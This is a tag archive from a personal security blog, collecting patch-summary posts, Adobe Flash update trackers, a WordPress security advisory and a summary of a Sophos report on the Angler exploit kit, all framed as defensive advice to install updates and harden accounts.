Tag Archives: Exploit Kit

May 2018 Update Summary

====================
Update: 5th June 2018:
====================
As discussed in the post below, the zero day vulnerability (defined) designated as CVE-2018-8174 (defined) patched by Microsoft last month has since been incorporated into the RIG exploit kit (defined). The attackers have used the extra detail provided from anti-malware vendors, GitHub (the popular source code repository) and MetaSploit (defined) to create this exploit.

As detailed below, the vulnerability is considered medium severity; however it also requires actions from the user before it take any malicious action usually opening a malicious file or visiting a malicious website.

Please use caution for any email that you receive with an attachment you weren’t expecting. Thank you.

====================
Update: 31st May 2018:
====================
A vulnerability in the JScript (Microsoft’s implementation of JavaScript (defined) has been responsibility disclosed (defined) by Dmitri Kaslov of Telspace Systems, who passed it along to Trend Micro’s Zero-Day Initiative (ZDI). At this time, this vulnerability is un-patched and is thus a zero day vulnerability (defined).

The vulnerability allows a remote attacker to execute malicious instructions of their choice on the victim’s system but only in the context of a sandboxed (defined) environment. In other words, the code cannot itself be used to fully compromise a system. It must be leveraged with another vulnerability to have the potential of fully compromising a system making the vulnerability less serious.

At this time, components within Windows such as wscript.exe and Internet Explorer should not not permitted to run untrusted JScript code. This mitigation (please see the heading near the end of the page named: “How To Tell Explorer To Open .JS Files With Notepad”) may be of assistance with implementing this recommendation.

I will update this post when this vulnerability is patched by Microsoft or when further information becomes available.

Thank you.

====================
Update: 18th May 2018:
====================
Other updates made available by Microsoft for the Spectre Variant 2 vulnerability are:

kb4100347

This update was not offered to my Windows laptop running Version 1803. As you know it contains an Intel Core i7 6500U CPU. I downloaded the version 1803 update from the Microsoft Catalog and it installed successfully. My system is showing the full green result when the PowerShell command Get-SpeculationConntrolSetting is run. It results in the final screenshot shown with this article. Further tips on running this useful command are provided in this Microsoft support article, please see the headings “PowerShell Verification using the PowerShell Gallery (Windows Server 2016 or WMF 5.0/5.1)” or “PowerShell Verification using a download from Technet (earlier operating system versions and earlier WMF versions)” depending on your version of Windows.

Microsoft have also issued an update for Windows version 1709 to resolve a vulnerability again introduced by their previous patch. This resolution was provided in update kb4103727. Further details are available in Alex Ionescu’s tweet (a security architect with CrowdStrike and Windows Internals expert). Previous Spectre V2 patches were kb4091666 and kb4078407

This issue was already addressed in version 1803 of Windows.

If any of the above updates apply for your version of Windows, please install them. If the updates are already present or are not required; the installation will not proceed when you manually attempt it.

Thank you.

====================
Update: 17th May 2018:
====================
Adobe have since issued further updates to resolve critical vulnerabilities within Adobe Acrobat DC, Adobe Reader DC and Photoshop. Further details of the zero day (defined) vulnerabilities addressed in Adobe Acrobat/Reader are available here and here.

Adobe Acrobat and Reader (priority 1, 47 CVEs)

Adobe Photoshop CC 2018 and 2017 (priority 3, 1 CVE).

Further updates are listed at the end of this post. Thank you.

====================
Update: 10th May 2018:
====================
Further details have emerged of another zero day (defined) vulnerability affecting Windows Server 2008 R2 and Windows 7.

CVE-2018-8120 is an elevation of privilege (defined) vulnerability but can only be exploited if the attacker has already compromised the user account of the system allowing the attacker to log in when they choose. Upon logging in the attacker could obtain kernel level access/permissions (defined) by elevating their privileges to carry out any action they choose.

The prioritised list below has been updated to reflect this. Thank you.
====================

====================
Original Post:
====================

====================
Apologies for only posting an update summary last month. Other commitments meant I didn’t have the bandwidth to contribute more. I’ll try to make more time this month. Thanks.
====================

Earlier today Microsoft released their scheduled monthly security updates resolving 67 vulnerabilities. Notably Windows 10 Version 1803 receives it’s first update this month. Windows Server 2016 Version 1803 remains in testing in advance of it’s upcoming release. As always Microsoft have provided further details are provided within their Security Updates Guide.

There are 4 knowledge base articles detailing potential issues (all of which are pending resolutions) you may experience upon installing these updates. They are listed below for your reference:

4103712

4103718

4103723

4103727

====================

Separately, Adobe released updates for 3 of their products, namely:

Adobe Creative Cloud Desktop Application (priority 2 (overall), 3x CVEs)

Adobe Connect (priority 2, 1x CVE)

Adobe Flash Player (priority 2, 1x CVE)

Non-Microsoft browsers should update automatically e.g. Google Chrome should release a browser update in the coming days or will use their component update feature (the update was not available at the time of writing). Like last month; Microsoft issued a security advisory containing details of their updates

As always; you can monitor the availability of security updates for most your software from the following websites (among others) or use one of the utilities presented on this page (since Secunia PSI was phased out on the 20th of April):
—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates. News/announcements of updates in the categories of General SoftwareSecurity Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.

====================
For this month’s Microsoft updates, I will prioritize the order of installation below. A useful list of all CVEs for this month is present here:
====================

Windows VBScript Engine Remote Code Execution Vulnerability (a zero day (defined) vulnerability)

Win32k Elevation of Privilege Vulnerability

Microsoft Edge and Internet Explorer (similar to last month multiple versions of Edge and IE affected with many of the CVEs affecting the Microsoft Scripting Engine))

Microsoft Hyper-V (Update 1 and Update 2)

Microsoft Office (detailed list available here)
====================
Please install the remaining updates at your earliest convenience.

One of the vulnerabilities addressed by Microsoft this month, namely CVE-2081-8897: Windows Kernel Elevation of Privilege Vulnerability arose due to the misinterpretation of documentation from Intel regarding how a CPU (defined) raise a debug (defined) exception to transfer control to debugging software (usually used by a software developer). The specific instructions were the assembly language instructions (defined) MOV to SS and POP to SS.

As usual; I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues. I have provided further details of updates available for other commonly used applications below.

Thank you.

=======================
Malwarebytes Anti-Malware
=======================
Last week Malwarebytes updated their anti-malware product to version 3.5.1. The full list of improvements is available here but it also updated their include 7-Zip to version 18.05. I verified this manually since the above release notes did not make reference to it. Further details of the 7-Zip update are available in my April blog post.

Moreover; Directory Opus updated their product to version 12.8.1. Beta adding new DLLs (defined) for 7-Zip and UnRAR once again to address the vulnerabilities found within the UnRAR DLL also used by 7-Zip.

=======================
Mozilla Firefox:
=======================
This month Mozilla made available security updates for Firefox and Firefox ESR (Extended Support Release):

9th May: Firefox 60.0: Resolves 2x critical CVEs, 6x high, 14 moderate CVEs and  4x low severity CVEs

9th May: Firefox ESR 52.8: Resolves 2x critical, 5x high, 3x moderate CVEs

Further details of the security issues resolved by these updates are available in the links above. Details of how to install updates for Firefox are here. If Firefox is your web browser of choice, if you have not already done so, please update it as soon as possible to resolve these security issues.

=======================
Google Chrome:
=======================
Google released Google Chrome version 66.0.3359.170 to address 4 number of vulnerabilities and to include a newer version of Adobe Flash Player.

One of the four vulnerabilities addressed relates to how Chrome handles browser extensions resolving a privilege escalation issue (defined). Further details are availability here.

=======================
Wireshark 2.4.7 and 2.6.1
=======================
v2.4.7: 6 security advisories

v2.6.1: 9 security advisories

As per standard process Linux distributions can obtain this update using the operating systems standard package manager (if the latest version is not installed automatically using the package manager you can instead compile the source code (v2.6.1) or v2.4.7). This forum thread and this forum thread may also be helpful to you with installing Wireshark on your Linux based system.

For Mac OS X and Windows, the update is available within the downloads section of the Wireshark website. In addition, a detailed FAQ for Wireshark is available here.

=======================
USB Denial of Service (DoS) Will not Receive a Fix
=======================
In other vulnerability related news; a denial of service issue (defined) privately/responsibly disclosed (defined) by a security researcher Marius Tivadar will not fixed by Microsoft with a security update since the vulnerability requires physical access to the target system or social engineering (defined) and does not result an attacker being able to execute code of their choice on the affected system.

In my opinion; this is justified since if an attacker can obtain physical access to your system it significantly enhances the damage they can do. This statement also forms part of Microsoft’s 10 Immutable Laws of Security.

====================
Update: 31st May 2018
====================

=======================
VideoLAN VLC:
=======================
Yesterday VideoLAN made available VLC version 3.0.3 for Linux, Windows, macOS, BSD, Android, iOS, UWP and Windows Phone. It’s release notes detail one potential security issue (buffer overread  (defined)) and other 3rd party libraries being updated to address security issues. No specific numbers were provided. A large number of non-security issues were also resolved.

Please update to version 3.0.3 to benefit from these improvements.

=======================
Google Chrome:
=======================
Earlier this month Google made available version  67 delivering 34 security issues. The improvements part of this new version are discussed in this Bleeping Computer article.

Moreover this version includes an early implementation of a new user interface for the tabs, address bar, settings button (sometimes referred to as the “chrome” (no pun intended) of an application). This article provides more details and includes steps to enable the new UI. I have done so and it’s a subtle difference but I already really like it. The Incognito mode is even more noticeable. The UI also seems more responsive (but that may be placebo effect).

Google Chrome updates automatically and will apply the update the next time Chrome is closed and then re-opened. Chrome can also be updated immediately by clicking the Options button (it looks like 3 stacked small horizontal lines, sometimes called a “hamburger” button) in the upper right corner of the window and choosing “About Google Chrome” from the menu. Follow the prompt to Re-launch Chrome for the updates to take effect.
=======================

=======================
Apple Security Updates:
=======================
In late May Apple made available the following updates. Interestingly while the updates were available; no specific details of the improvements they include (security or otherwise) are yet available.

Initially, further details of the updates made available by Apple are emerging. Sophos have theroized that Apple have made improvements to the iOS Messages app making it more stable and less susceptible to crashing. They are thus recommending that you install the iOS 11.4 update as soon as possible.

They also discuss the addition of a new security feature which blocks access to a mobile device if the passcode has not been entered within the last seven days. This change is expected to become part of 11.4.1 and a stricter form for iOS 12. After this time the Apple Lightning cable will only charge the device and not allow data access. This appears to be part of Apple’s response to law enforcement and forensics firms accessing Apple devices attempting to collect evidence of the device’s owner’s wrongdoings.

Further details have since emerged for these Apple security updates:

Apple iOS v11.4 (resolves 35x CVEs (defined))

Apple tvOS 11.4 (resolves 24x CVEs)

Apple watchOS 4.3.1 (resolves 20x CVEs)

Apple iTunes version 12.7.5 for Windows (resolves 16x CVEs)

Moreover, BleepingComputer have discussed two of the vulnerabilities patched were buffer overflows (defined) both present in the kernels (defined) of iOS, macOS, tvOS and watchOS.

=======================

Please see these links from Apple for advice on backing up your iPhone and iPad. Advice for updating tvOS is available here while the steps for updating the Apple Watch are available here.

As always; further details of these updates are available on Apple’s dedicated security updates page.

For advice on how to install updates for Apple devices, please see the steps detailed at the end of this Sophos blog post as well as this link (from my “Protecting Your PC” page).

=======================
Hitman Pro:
=======================
As recommended on my Tools and Resources page, Hitman Pro (now part of Sophos Security) has been updated to version 3.8.20 (Build 294). This update resolves a vulnerability relating to DLL hijacking (defined)(apologies; for this link you may need to dismiss several adverts before the requested page loads). Any previous version of the tool should update automatically when opened to the most recent version.

Adobe Flash Player 2018 Update Tracker

Just like the 2015 and 2016 tracker  and 2017 trackers that are incredibly popular on this blog; I am providing the same information below for the year 2018.

I have created a new post to make the timeline easier to follow. As before it will be updated throughout the year with any details of the Flash vulnerabilities being exploited.

Thank you.

=======================

=======================
9th January: Adobe releases Flash Player v28.0.0.137 resolving 1x priority 2 CVE (defined).

6th February: Adobe releases Flash Player v28.0.0.161 resolving 2x priority 1 CVEs. Please see the timeline update for the 13th of April (below) for more information on how one of these vulnerabilities is now being exploited.

13th March: Adobe releases Flash Player v29.0.0.113 resolving 2x priority 2 CVEs.

10th April: Adobe releases Flash Player v29.0.0.140 resolving 6x priority 2 CVEs.

8th May 2018: Adobe releases Flash Player v29.0.0.171 resolving 1x priority 2 CVE.

7th June 2018: Adobe releases Flash Player v30.0.0.113 resolving 4x CVEs with an overall priority of 1.

10th July 2018: Adobe releases Flash Player v30.0.0.134 resolving 2x CVEs with an overall priority of 2.

14th August 2018: Adobe releases Flash Player v30.0.0.154 addressing 5x CVEs with an overall priority of 2.

11th September 2018: Adobe releases Flash Player v31.0.0.108 addressing 1x CVE with an overall priority of 2.

14th November 2018: Adobe releases Flash Player v31.0.0.148 addressing 1x priority 2 CVE.
=======================

Update: 10th January 2018: The timeline was updated to add the Adobe Flash Player update for January 2018. At the time of writing no exploits for the issue fixed by this update are known to be taking place.

Update: 13th February 2018: The timeline was updated to add the Adobe Flash Player update for February. One of these vulnerabilities CVE-2018-2878 is a zero day (defined) vulnerability being exploited in targeted attacks.

Update: 13th March 2018: The timeline was updated to add the Adobe Flash Player update for March. At the time of writing neither of the 2 vulnerabilities fixed are being exploited.

Update 1st April 2018: No further vulnerabilities within Flash Player were disclosed during the Pwn2Own 2018 competition.

Update 13th April 2018: The timeline was updated to add the Adobe Flash Player update for April. At the time of writing none of the 6 vulnerabilities fixed are being exploited.

Update 8th May 2018: The timeline was updated to add the Adobe Flash Player update for May. Similar to April; at the time of writing the resolved vulnerability is not being exploited.

CVE-2018-4878; the use after free (defined) vulnerability resolved by Adobe in February is now being used by the ThreadKit exploit key (defined) to send Microsoft Office documents exploiting this flaw. Please update Adobe Flash Player if you have it installed and do not open any document attached to an email you weren’t expecting. Further details are available in this news article.

Update: 12th June 2018: The timeline was updated to add the Adobe Flash Player update for June. This was released ahead of schedule on the 7th of June. This update resolved a zero day vulnerability (defined) CVE-2018-5002 which required little to no user interaction to trigger. Further details are available in my separate blog post.

Update: 27th July 2018: A US Senator has asked for 3 government agencies to cease using Adobe Flash by August 2019 in advance of the deadline set by Adobe for of the end of year 2020. The timeline was also updated to include the Adobe Flash Player update for July.

Update 23rd August 2018: The timeline was updated to add the Adobe Flash Player update for August. At the time of writing none of the 5 addressed vulnerabilities are being exploited.

Update 9th October 2018: The timeline was updated to add the Adobe Flash Player update for September (sorry for the delay). At the time of writing the addressed vulnerability is not being exploited. No updates for October 2018 have been issued.

Update 14th November 2018: The timeline was updated to add the Adobe Flash Player update for November. At the time of writing the addressed vulnerability is not being exploited. No updates for October 2018 were issued.

=======================

February 2017 Security Updates Summary

=======================
Update: 28th February 2017
=====================
Apologies for not updating this post sooner.

On the 21st of February Microsoft made available their re-packaged update of Adobe Flash Player kb4010250 for Windows 8.1 and Windows 10 systems.

The Adobe Flash Player within Google Chrome should have automatically updated earlier this month. If this link shows the version installed older than v24.0.0.221, you can use the steps within this article to quickly update Google Chrome Flash Player using it’s component updater to the latest version.

An alternative which I have not tried is to use this download from Softpedia to take the place of the Microsoft update (mentioned above) but this shouldn’t be necessary since month long postponements of security updates should be extremely rare.

It’s very likely next month’s Update Tuesday will be busy. There were very few updates in January and no Microsoft updates in February. On the 23rd of February Google’s Project Zero team publically disclosed a second unpatched security vulnerability in Microsoft Internet Explorer and Edge. They also recently disclosed a vulnerability in Windows GDI. Combine this with an existing zero day (defined) Windows Server Message Block (SMB) vulnerability, a Firefox update expected on the 6th of March and Pwn2Own on the 15th to 17th of March; this will be a busy month!

As always, I will be here to guide you through it. Thank you.

====================
Original Post:
====================
As I am sure you are aware the release of Microsoft’s security updates were delayed as per their blog post. I will detail Adobe’s scheduled updates below and update this post when they are available.

====================
Adobe made 3 security bulletins available for Adobe Flash , Adobe Digital Editions and Adobe Campaign. The Flash Player bulletin resolves 12x priority 1 vulnerabilities. The Digital Editions and Campaign updates addressing 9 and 2 vulnerabilities respectively (both sets are priority 3). Adobe’s priority rating are explained in this link.

Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin (link to be added when available) as appropriate and apply the recommended updates. Google Chrome users will have the updated installed automatically alongside the updated version of Google Chrome which will most likely be made available by Google either later today or in the next 1 to 2 days.

If you use any of the above Adobe products, please review the security bulletins linked to above and apply the necessary updates. The Flash update should be installed as soon as possible since exploit kits (defined) tend to take advantage of newly disclosed vulnerabilities very quickly.

You can monitor the availability of security updates for most your software from the following websites (among others) or use Secunia PSI:
—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.
—————
If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

While there may only be 3 Microsoft bulletins this month, I will prioritise the order of updates for you below:

Another security pre-caution that you may wish to take if you have Microsoft EMET (please ensure your version of EMET is the most recent version 5.51) installed is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations of how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As always, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

January 2017 Security Updates Summary

Earlier today Microsoft and Adobe released their scheduled monthly security updates.

Microsoft only made 4 bulletins available. These updates address 3 vulnerabilities listed within Microsoft’s security bulletin summary (as before excluding the Adobe bulletin). These are more formally known as CVEs (defined).

Once again; there are no Known Issues listed within the above summary page. At the time of writing the IT Pro Patch Tuesday blog does not list any Known Issues. However, please check it before deploying your security updates just to be sure. As always, if any issues do arise, those pages should be your first places to check for solutions.

Next month Microsoft will only be publishing it’s security bulletins and release notes within their Security Updates Guide; rather than distributing this information across several pages. This post from WinSuperSite explains the changes in full.

====================
Adobe made a pair of security bulletins available for Adobe Flash and Adobe Acrobat/Adobe Reader. The Flash Player bulletin resolves 13x priority 1 vulnerabilities. The Adobe Acrobat/Adobe Reader resolves 29x priority 2 vulnerabilities. Adobe’s priority rating are explained in the previous link.

Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin as appropriate and apply the recommended updates. Google Chrome users will have the updated installed automatically alongside the updated version of Google Chrome which will most likely be made available by Google either later today or in the next 1 to 2 days.

If you use Flash or Adobe Acrobat/Adobe Reader any of the above products, please review the security bulletins linked to above and apply the necessary updates. The Flash update should be installed as soon as possible since exploit kits (defined) tend to take advantage of newly disclosed vulnerabilities very quickly.

You can monitor the availability of security updates for most your software from the following websites (among others) or use Secunia PSI:

—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.
—————

If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

While there may only be 3 Microsoft bulletins this month, I will prioritise the order of updates for you below:

The update for Microsoft Office should be installed first due to it’s criticality. This should be followed by the update for Microsoft Edge and finally by the LSASS update. The update for Edge is important due to exploit kits relying on such patches not to be installed in order to spread further malware (defined).

As always you can find detailed information on the contents of each security bulletin is published each month within ComputerWorld’s Patch Tuesday Debugged column.

Another security pre-caution that you may wish to take if you have Microsoft EMET (please ensure your version of EMET is the most recent version 5.51) installed is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations of how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As is my standard practice, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

Adobe Flash Player 2017 Update Tracker

In a similar manner to the 2015 and 2016 tracker that was incredibly popular on this blog; I am providing the same information below for the year 2017.

I have created a new post to make the timeline easier to follow. It will be updated throughout the year with any details of the Flash vulnerabilities being exploited.

Thank you.

=======================
10th January: Adobe releases Flash Player v24.0.0.194 resolving 13 CVEs.

14th February: Adobe releases Flash Player v24.0.0.221 again resolving 12 CVEs.

14th March: Adobe releases Flash Player v25.0.0.127 resolving 8 CVEs.

11th April: Adobe releases v25.0.0.148 resolving 7 CVEs (including some from Pwn2Own 2017).

9th May: Adobe releases Flash Player v25.0.0.171 resolving 7 CVEs.

13th June: Adobe releases Flash Player v26.0.0.126 resolving 9 CVEs.

11th July: Adobe releases Flash Player v26.0.0.137 resolving 3 CVEs. It’s refreshing to see such a small number of CVEs being patched. However it will be interesting to see if this trend continues next month.

8th August: Adobe releases Flash Player v26.0.0.151 resolving 2 CVEs. Similar to last month the number of vulnerabilities is low. It’s not yet clear if this is due to Adobe’s recent announcement to de-commission Flash Player in 2020.

12th September 2017: Adobe have released Flash Player v27.0.0.130 to resolve 2 critical CVEs. Similar to recent months the number of vulnerabilities being addressed remains low.

16th October 2017:  Adobe released Flash Player v27.0.0.170 to resolve 1 critical CVE being exploited by the BlackOasis APT group.

14th November 2017 Adobe releases Flash Player v27.0.0.187 to resolve 5 critical CVEs. No known exploits for these issues were observed at the time of release or following the release.

12th December 2017 Adobe releases Flash Player v28.0.0.126 to fix 1 moderate CVE. As for November; no known exploits were used to target this vulnerability.

=======================

Update: 10th January 2017: The timeline was updated to add the Adobe Flash Player update for January 2017. At the time of writing no exploits for the issues fixed by this update are known to be taking place.

Update: 14th February 2017: The timeline was updated to add the Adobe Flash Player update for February 2017. At this time no exploits for the issues fixed by this update are known to be taking place.

Update: 14th March 2017: The timeline was updated to add the Adobe Flash Player update for March 2017. At this time no exploits for the issues fixed by this update are known to be taking place. With Pwn2Own 2017 due to take this place this month expect more updates soon.

Update: 11th April 2017: The timeline was updated to add the Adobe Flash Player update for April 2017. As before, at the time of writing no exploits for the issues fixed by this update are known to be taking place.

Update: 8th May 2017: I have corrected the number of vulnerabilities addressed in the February and March updates mentioned adove. While the numbers I originally listed were correct at the time of writing, Adobe subsequently revised them. The end of the February and March bulletins highlight the revisions made by Adobe. I will endeavor to updates these entries sooner in future.

Update: 9th May 2017: The timeline was updated to add the Adobe Flash Player update for May 2017. At this time, no exploits for the issues fixed by this update are known to be taking place.

Update: 14th June 2017: The timeline was updated to add the Adobe Flash Player update for June 2017. At the time of writing; no exploits for the issues fixed by this update are known to be taking place.

Update: 11th July 2017: The timeline was updated to add the Adobe Flash Player update for July 2017. Just like for June 2017; no exploits for the issues fixed by this update are known to be taking place.

Update: 8th August 2017: The timeline was updated to add the Adobe Flash Player update for August 2017. As before; no exploits for the issues fixed by this update are known to be taking place.

Update: 12th September 2017: The timeline was updated to include the Adobe Flash Player updates for September 2017. Similar to last month, no exploits for the issues fixed by this update are known to be taking place at this time.

Update: 18th October 2017: The timeline was updated to include the Adobe Flash Player updates for October 2017. It addresses a zero day vulnerability known to be under exploit.

Update: 26th December 2017: The timeline was updated to include the Adobe Flash Player updates for November and December 2017. Sorry for the delay in updating this.

WordPress Releases Security Update (February 2016)

On the 3rd of February WordPress released a security update to their popular self-hosted blogging tool/content management system (CMS, defined) bringing it to version 4.4.2.

This is a critical security update that resolves 2 security issues. One is a server-side request forgery (SSRF) attack that could allow information disclosure since it has the potential to bypass normal access controls. The remaining issue was present on the login page of WordPress which could have been used to cause a redirect for a user trying to login.

Due to the severity of these issues, WordPress is advising it’s users to update immediately.

Separately a ransomware (defined) campaign is compromising very large numbers of WordPress websites by adding obfuscated (defined within this post) JavaScript (defined) to the websites that results in visitors to those sites being redirected to a website of the attacker’s choice. The JavaScript can deliver the ransomware to a victim system if it is using outdated versions of Adobe Flash Player/Reader, Microsoft Internet Explorer or Silverlight since it makes uses of the Nuclear exploit kit (defined). At this time there is very little detection of the exploit code using VirusTotal.com

A shortlist of recommendations to protect your WordPress website against this ransomware campaign is shown below (for your convenience). This list including further details of this threat is available from Heimdal Security’s blog post (I wish to express my sincere thanks to them for making such detailed information available to protect against this threat):

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.

Moreover; a technical description of how this attack occurs against a WordPress website is available within this Sucuri blog post. Malwarebytes also provide advice and a further technical description in their blog post as they describe how the exploits have switched from the Nuclear exploit kit (defined) the to the Angler exploit kit.

As always; WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

For more information on installing updates to commonly used software, this blog can assist. Please see the “Protecting Your PC” page for how to keep software updated. Moreover; specific information on Adobe updates is available here with Microsoft updates discussed here.

Thank you.

Sophos Report on Angler Exploit Kit

Update: 7th September 2015:
A recent report from Cisco discussed further in this article describes the increasing prevalence and success of the Angler exploit kit due to it quickly integrating newly disclosed security vulnerabilities, it’s use of domain shadowing and a delay in Adobe Flash users installing security updates.
=======================
Original Post:

With the recent disclosure of several Adobe Flash zero day (zero day, defined) security vulnerabilities which were quickly taken advantage of by attackers using malware exploit kits, it is becoming more important to know how to defend against these attacks.

This Sophos report provides a detailed analysis of how the exploit kits operate with a specific emphasis on the most prevalent exploit kit, the Angler exploit kit. At the end of the report, in the comments section Sophos describes the recommended actions to take to prevent such attacks occurring either by your website becoming compromised or the exploit kit attacking one of your computing devices. I have also highlighted these recommendations below (my thanks to Sophos for providing them):

  • Uninstall browser plugins such as Adobe Flash and/or Microsoft Silverlight if you don’t use them. However if you do make use of them, consider having more control over their usage (e.g. Click to Play, supported by all browsers except Internet Explorer).
  • Keep your operating system e.g. Linux, Apple Mac OS X or Windows and your most used programs up to date and install all security updates made available for them. I discuss updating/patching within the “Protecting Your PC” page.
  • Install anti-malware software. Both paid for and free versions are available (e.g. Malwarebytes, Avast, Microsoft Security Essentials etc.). Apple Mac OS X and Linux versions are also available (the provided links are examples of the many products available). Please choose a package that meets your needs in terms of functionality and price. Products which include heuristics (heuristics, defined) should have more success in preventing these attacks from infecting your devices.

Since the exploits delivered by these exploit kits seek to evade detection using obfuscation (further information on obfuscation techniques) and building unique exploits for each request received to access the exploit website makes the detection of these threats using anti-malware increasingly difficult. Anti-sandbox techniques (e.g. detecting virtual machines and tools such as Fiddler) are also used to make analysis of the exploit samples more difficult by malware researchers seeking to build detections against them.

In addition to the recommendation of using anti-malware software; for corporate environments the use of next-generation IPS (NGIPS) (Intrusion Prevention Systems, defined) can be used to detect these exploits as they attempt to attack your devices.

Within the Sophos report a technique is mentioned that was employed by the attackers using exploit kits to bring traffic to websites of their choice, this technique is known as DNS shadowing. This is a technique where a legitimate websites domain name (www-example.com) is used to create subdomains (e.g. random.malware.example.com or malware.example.com) that can then be used by the attackers. These subdomains have a very short life time (e.g. a matter of minutes) which makes them difficult to predict and block using blacklists (a list of IP addresses or domain names e.g. www-example.com that are blocked due to those addresses or domain sending spam or hosting malware (that is delivered to the visitors to such websites).

These subdomains can be created since the login credentials for the domain registration e.g. from companies such as GoDaddy have been compromised by the attackers. Since many website owners infrequently check these accounts it makes them more susceptible to being compromised without being noticed. These accounts initially become compromised by a phishing attack. As well as using the advice within the phishing article linked to above, as per Sophos’ advice the following would be recommendations to detect and prevent such occurrences of your domain registration account becoming compromised:

  1. Send email notifications after DNS changes: This will allow to take action to re-secure your account e.g. changing your password and/or enabling two-factor authentication.
  2. Implement two-factor authentication: This article explains how to enable this feature for GoDaddy accounts.

The above 3 suggestions from Sophos (in addition to the use of NGIPS for corporate environments) along with the advice concerning the protection of your domain registration accounts should you keep safe from this prevalent and sophisticated exploit kit.

Thank you.